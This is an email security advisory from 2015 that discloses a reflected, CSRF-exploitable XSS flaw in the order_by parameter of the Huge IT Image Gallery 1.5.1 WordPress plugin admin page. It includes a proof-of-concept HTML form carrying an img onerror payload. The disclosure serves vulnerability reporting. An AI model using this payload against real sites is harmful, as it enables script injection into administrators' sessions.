Subject: Cross-Site Scripting (XSS) in Huge IT Image Gallery 1.5.1
Date: Thu, 20 Aug 2015 12:10:42 +0200

Hello,

Plugin: Huge IT Image Gallery 1.5.1 https://wordpress.org/plugins/gallery-images/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=gallerys_huge_it_gallery
Vulnerable parameters: order_by

Example PHP callstack:
showgallery   [/gallery-images/admin/gallery_func.php:67]
html_showgallerys   [/gallery-images/admin/gallery_view.php:186]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=gallerys_huge_it_gallery" />
<input type="text" name="order_by" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,